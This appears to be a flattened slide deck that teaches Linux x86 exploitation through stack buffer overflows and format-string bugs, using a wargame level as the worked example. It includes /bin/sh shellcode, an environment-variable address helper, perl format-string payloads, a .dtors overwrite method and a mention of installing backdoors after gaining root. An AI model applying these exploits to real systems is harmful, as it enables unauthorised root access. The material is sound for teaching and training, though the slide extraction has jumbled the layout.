2. ELF Binaries
• ELF == Executable and Linkable Format
• Different segments, .text, .data, .bss and so on
• Layout of binary in memory
3. Top of memory
The segments stack 0xFFFFFFFF
nothing (empty)
• .text (code)
• .data
heap
• .bss
.bss
• heap
.data
• stack
.text (code)
Bottom of memory
0x00000000
4. The Stack
• Stack is used for function calls.
• There are 2 registers on the CPU associated with the stack, the EBP (Extended
Base Pointer) and ESP (Extended Stack Pointer)
• ESP points to the top of the stack, whereas EBP points to the beginning of the
current frame.
• When a function is called, arguments, EIP and EBP are pushed onto stack.
• EBP is set to ESP, and ESP is decremented to make space for the functions local
variables.
5. The Stack
Continued
0xbfff9000 0xbfff9000
the stack saved EIP the stack
0x08049800 0x08049800
0xbfffdd08
saved EBP 0xbfffdd08
func_1() EBP func_1() saved EIP
char buf[128]; char buf[128];
saved EBP
ESP 0x08049800
0xbfffdd08
func_2() EBP
Free memory saved EIP == ret addr int i = 0;
float z = 99.9;
ESP
Free memory
0xbfff8000 0xbfff8000
6. Buffer Overflows
• Programming bug
the stack the stack the stack
• Input or data is not 0x08049800
saved EIP
0x08049800 0x41414141
properly bounds 0xbfffdd08 saved EBP 0xbfffdd08 0x41414141
checked func_1() func_1() func_1()
0x00000000 0x41414141
0x41414141
•
char buf[128]; 0x41414141
Example Code: 0x41414141 0x41414141
char some_data[256];
memset(some_data,’A’,254);
Free memory Free memory Free memory
memcpy(buf,some_data);
7. Exploiting : The Aim
Our aim is to somehow main()
func3()
divert the flow of the int i;
int x = 0; int one = 1;
program and get it to char *ptr; int two = 2;
int three = 3;
execute what we want.
func4()
func1() func2()
char buf[32] char *p = 0;
int *p; int i = 0,x = 0;
int size = 0; float temp;
exit(-1);
8. Exploiting : The Aim
Our aim is to somehow main()
func3()
divert the flow of the int i;
int x = 0; int one = 1;
program and get it to char *ptr; int two = 2;
int three = 3;
execute what we want.
func4()
func1() func2() shellcode()
char buf[32] char *p = 0; NOP
int *p; int i = 0,x = 0;
int size = 0; float temp;
exit(-1);
execl();
9. Method 1 : Smashing the Stack
Putting it all together
Using input or data that
the stack
• Combine what we saved EIP
0x41414141
we provide, we can control
the value that gets written
know about stack, saved EBP 0x41414141
and buffer func_1() over the return address,
overflows 0x41414141 or saved EIP value.
0x41414141
0x41414141
• Can use this to
redirect the flow
of execution Free memory
12. Show me the MONEY!
saved EIP
the stack
0x41414141
We control this.
saved EBP 0x41414141
func_1() But now that we control the return address,
0x41414141 what do we do with it?
0x41414141
0x41414141
Where do we want the flow of execution to go?
Free memory
The Answer?
13. Shellcode
Example Shellcode:
• This is just code that spawns a shell.
“x31xc0xb0x46x31xd
• Comes in many different varieties. bx31xc9xcdx80xeb
x16x5b
• Some bind to ports, some connect to specific x31xc0x88x43x07x89
x5bx08x89x43x0c
servers, some just spawn a local shell, some really
xb0x0bx8dx4bx08x8d
small, some are multipart. x53x0cxcd
x80xe8xe5xffxffxffx2f
• All created to suit the needs of the creator for x62x69x6ex2fx73x68”
whatever purpose he might need them for, or to
avoid certain restrictions that limit its execution. Spawns a “/bin/sh” process.
14. Shellcode
Continued
• Now that we know we need to use shellcode, where do we put it.
• There are a couple options, all depending on various factors.
• Environment Variable
• Inside the overflown buffer itself
• Some other part of memory that we can write to
• etc
15. Example 01 : Exploited
Shellcode in Environment
getenvaddr.c :
Variable:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int arc, char *argv[]){
char *ptr;
if(argc < 3){
printf(“Usage : %s <env var> <program name>n”,argv[0]);
exit(0);
}
ptr = getenv(argv[1]);
ptr += (strlen(argv[0]) - strlen(argv[2])) * 2;
printf(“%s will be at %pn”,argv[1],ptr);
Getting address of return 0;
Environment Variable: }
17. Example 01: We have shell
• We have now exploited the program
• We gained new access level, namely moving from “tritured” to “root”
• From here we can do various other things, like install backdoors, or
kernel mods, etc.
18. Example 02 : Exploited
Get address of SHELLCODE env variable:
This time, we not going to use a NOP sled, so have to be precise:
19. IO level 6 : Real World
level6.c :
#include <string.h>
• As you can see, the programmer has
// The devil is in the details - nnp implemented some bounds checking to
void copy_buffer(char *argv[]) prevent buffer overflows
{
•
char buf1[32], buf2[32], buf3[32];
However, he has introduced a new bug,
strncpy(buf2, argv[1], 31);
strncpy(buf3, argv[2], sizeof(buf3)); called an off-by-one error
strcpy(buf1, buf3);
•
}
int main(int argc, char *argv[])
We can still overflow the buffer
{
copy_buffer(argv);
return 0; • And we still overwrite EIP to point to our
} shellcode
20. IO Level 6 : Cont
How strings work, and are delimited in memory:
0xbfbfeea0 0xbfbfeea1 0xbfbfede 0xbfbfedf
0x09 This is just some random text to help show how a string works 0x00
NULL byte
Level 6’s copy_buffer stack layout:
0xbfbfaa00 0xbfbfaa20 0xbfbfaa40
buf3[32] buf2[32] buf1[32]
some text here 0x00 some other text 0x00 and some other string 0x00
21. IO Level 6 : Cont
The problem lies in these 3 lines:
strncpy(buf2, argv[1], 31);
strncpy(buf3, argv[2], sizeof(buf3));
strncpy(buf1, buf3);
• The first line copies at most 31 bytes, leaving space for a NULL byte at the end.
• The second line however, copies at most 32 bytes, and therefore, might not leave space for
a NULL pointer at the end, this is where the off-by-one error comes in.
• The third line then copies buf3, into buf1, heres where we can overwrite the saved EIP
24. Method 02 : Format String
• Format strings are the next kind of bug that we will exploit
• They are normally caused by a programmer not providing a valid
format string to printf and just doing something like : printf(variable);
• However this becomes a bit of a problem, since we are no longer
overflowing a buffer, so therefore we cannot just overwrite the saved
EIP.
• This makes redirecting the program flow a bit more difficult
25. Format example of printf and how
Quick and dirty
String : Cont
function parameters are pushed onto stack:
printf:
With format string exploits, there are two
parameters to print that we need to use. example code:
The first paramter we will look at is “%x”. All that int count_one = 0;
%x does, is tell printf to print the hex value of the
variable in the corresponding position. eg: printf(“number of bytes written up to “
“this point%nn”,&count_one);
printf(“The value is : 0x%08xn”,size); printf(“count_one = %dn”,count_one);
printf(“The value of ”count_one” is “
The second parameter we need to look at is “: 0x%08xn”,count_one);
“%n”. What %n does is the opposite to the rest of
the printf parameters. Instead of reading value
from a variable and formatting it for display, it output:
actually saves the number of bytes that printf has
written to the variable in the corresponding number of bytes written up to this point
position, eg: count_one = 40
The value of “count_one” is : 0x00000028
printf(“Number of bytes written%nn”,&count);
26. Function Variables
How variables to functions are pushed to stack:
When functions are called and they need the stack
to pass variables, they use the stack to
z = 10 variable z
pass those variables i=2 variable i
Example code: 0xbfbf9977 address of format string
0x08048000 saved EIP
printf(“The value of i = %d, and z = %dn”,i, z); 0xbfffaa00 saved EBP
printf()
When variables are pushed to the stack,
they are pushed in reverse order, so with
the above, the following would happen:
push z;
push i;
push (address of format string) Free memory
27. Format Strings : Cont
Example Code:
include <stdio.h> • So we know how variables are pushed onto
include <string.h> the stack.
int main(int argc, char *argv[]){
char buf[1024]; • We know what parameters in the format
strncpy(buf, argv[1], sizeof(buf) - 1); string do what.
printf(buf);
• So what happens when we put more
return 0; parameters in the format string than there
}
are variables pushed onto the stack?
30. Format Strings : Memory Layout
Overwriting a single address:
Memory 5c 5d 5e 5f
First write to 0xbfbfe85c aa 00 00 00
Second write to 0xbfbfe85d bb 00 00 00
Third write to 0xbfbfe85e cc 00 00 00
Fourth write to 0xbfbfe85f dd 00 00
Result aa bb cc dd
Modifying our format string:
./format_string `perl -e 'print "x5cxe8xbfxbf" . "%08x"x10 . "%86x" . "%n"'`
./format_string `perl -e 'print "x5cxe8xbfxbfJUNKx5dxe8xbfxbf" . "%08x"x10 . "%86x%n"'`
33. Format Strings : What we know
• So, we can now write whatever value we want to whatever memory
address.
• So why dont we just overwrite the saved EIP?
• We could, but I wanted to introduce another section that makes it
much easier.
• The way to now gain control of program flow, is to add a value to
something called .dtors.
34. WTF is .dtors?
format_string:
• When writing a program, you
#nm ./format_string
080495f4 D _DYNAMIC
can create functions that run 080496b8 D _GLOBAL_OFFSET_TABLE_
w _Jv_RegisterClasses
either before the start of the 080496a8 d __CTOR_END__
main program, or after the 080496a4 d __CTOR_LIST__
080496b0 d __DTOR_END__
end of the program. 080496ac d __DTOR_LIST__
080495f0 r __EH_FRAME_BEGIN__
• These are called constructors 080495f0 r __FRAME_END__
080496b4 d __JCR_END__
and destructors, and are put 080496b4 d __JCR_LIST__
into the section of the code 080496d8 A __bss_start
#
called .ctors and .dtors #objdump -s -j .dtors ./format_string
respectively.
Contents of section .dtors:
80496ac ffffffff 00000000 ........
35. .dtors : Cont
.dtors section:
080496b0 d __DTOR_END__ = 0x00000000
080496ac d __DTOR_LIST__ = 0xffffffff
• The .dtors section is writable, so we can overwrite whatever value we
want into the addresses.
• So all we have to do is get the address of our shellcode.
• Change the address we want to overwrite (__DTOR_END__) to
contain that of our shellcode, and bobs our uncle.